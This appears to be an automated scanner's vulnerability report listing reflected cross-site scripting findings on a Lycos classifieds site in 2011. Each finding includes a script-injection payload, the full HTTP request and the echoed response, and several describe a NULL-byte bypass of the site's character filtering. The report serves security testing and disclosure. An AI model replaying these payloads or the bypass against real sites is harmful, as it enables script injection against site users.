The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62c87"><script>alert(1)</script>4bae919137 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-apartment62c87"><script>alert(1)</script>4bae919137/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:30 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-apartment62c87"><script>alert(1)</script>4bae919137/?mobile=1" rel="nofollow"> ...[SNIP]...
1.17. http://classifieds.lycos.com/housing-rent-apartment/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/housing-rent-apartment/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5793d"><script>alert(1)</script>d1a9830cbd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-apartment/?5793d"><script>alert(1)</script>d1a9830cbd5=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:48 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:48 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-apartment/?5793d"><script>alert(1)</script>d1a9830cbd5=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7f1f"><script>alert(1)</script>e88f4b85db9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-apartmentd7f1f"><script>alert(1)</script>e88f4b85db9/edgewater-beach-huge-2-br-2416172356 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 14:59:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:49 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17829
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-apartmentd7f1f"><script>alert(1)</script>e88f4b85db9/edgewater-beach-huge-2-br-2416172356?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001a8a3"><script>alert(1)</script>cc957f8555f was submitted in the REST URL parameter 2. This input was echoed as 1a8a3"><script>alert(1)</script>cc957f8555f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /housing-rent-apartment/edgewater-beach-huge-2-br-2416172356%001a8a3"><script>alert(1)</script>cc957f8555f HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:39 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25707
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356%001a8a3"><script>alert(1)</script>cc957f8555f?mobile=1" rel="nofollow"> ...[SNIP]...
1.20. http://classifieds.lycos.com/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee82"><script>alert(1)</script>e2446b54b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-apartment/edgewater-beach-huge-2-br-2416172356?bee82"><script>alert(1)</script>e2446b54b9=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:19 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fapartment; path=/ Set-Cookie: classifieds[lastpage][0][name]=Apartments+for+Rent; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356?bee82"><script>alert(1)</script>e2446b54b9=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c683a"><script>alert(1)</script>8715acf427 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-apartmentc683a"><script>alert(1)</script>8715acf427/fair-oaks-apartments-2416171985 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 14:59:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:39 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17811
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-apartmentc683a"><script>alert(1)</script>8715acf427/fair-oaks-apartments-2416171985?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0087882"><script>alert(1)</script>c0553fe1d09 was submitted in the REST URL parameter 2. This input was echoed as 87882"><script>alert(1)</script>c0553fe1d09 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /housing-rent-apartment/fair-oaks-apartments-2416171985%0087882"><script>alert(1)</script>c0553fe1d09 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:39 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-apartment/fair-oaks-apartments-2416171985%0087882"><script>alert(1)</script>c0553fe1d09?mobile=1" rel="nofollow"> ...[SNIP]...
1.23. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171985 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aeb3"><script>alert(1)</script>3b560751ac5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-apartment/fair-oaks-apartments-2416171985?4aeb3"><script>alert(1)</script>3b560751ac5=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:11 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:11 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fapartment; path=/ Set-Cookie: classifieds[lastpage][0][name]=Apartments+for+Rent; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-apartment/fair-oaks-apartments-2416171985?4aeb3"><script>alert(1)</script>3b560751ac5=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3123a"><script>alert(1)</script>f524eb41f7c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-apartment3123a"><script>alert(1)</script>f524eb41f7c/fair-oaks-apartments-2416171997 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 14:59:50 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:50 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17814
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-apartment3123a"><script>alert(1)</script>f524eb41f7c/fair-oaks-apartments-2416171997?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001175e"><script>alert(1)</script>a496097bfe7 was submitted in the REST URL parameter 2. This input was echoed as 1175e"><script>alert(1)</script>a496097bfe7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /housing-rent-apartment/fair-oaks-apartments-2416171997%001175e"><script>alert(1)</script>a496097bfe7 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:43 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-apartment/fair-oaks-apartments-2416171997%001175e"><script>alert(1)</script>a496097bfe7?mobile=1" rel="nofollow"> ...[SNIP]...
1.26. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171997 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218a8"><script>alert(1)</script>ab9259f54a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-apartment/fair-oaks-apartments-2416171997?218a8"><script>alert(1)</script>ab9259f54a3=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:13 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fapartment; path=/ Set-Cookie: classifieds[lastpage][0][name]=Apartments+for+Rent; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-apartment/fair-oaks-apartments-2416171997?218a8"><script>alert(1)</script>ab9259f54a3=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a93"><script>alert(1)</script>09cea7d799e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-apartment17a93"><script>alert(1)</script>09cea7d799e/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 14:59:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:37 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-apartment17a93"><script>alert(1)</script>09cea7d799e/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0066cfc"><script>alert(1)</script>e742502d564 was submitted in the REST URL parameter 2. This input was echoed as 66cfc"><script>alert(1)</script>e742502d564 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320%0066cfc"><script>alert(1)</script>e742502d564 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:24 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320%0066cfc"><script>alert(1)</script>e742502d564?mobile=1" rel="nofollow"> ...[SNIP]...
1.29. http://classifieds.lycos.com/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9acf"><script>alert(1)</script>05ba2e375bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320?e9acf"><script>alert(1)</script>05ba2e375bd=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:06 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fapartment; path=/ Set-Cookie: classifieds[lastpage][0][name]=Apartments+for+Rent; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320?e9acf"><script>alert(1)</script>05ba2e375bd=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f0de"><script>alert(1)</script>e40a3a03cb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing-rent-commercial-office_space9f0de"><script>alert(1)</script>e40a3a03cb1/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:11:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:01 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/housing-rent-commercial-office_space9f0de"><script>alert(1)</script>e40a3a03cb1/?mobile=1" rel="nofollow"> ...[SNIP]...
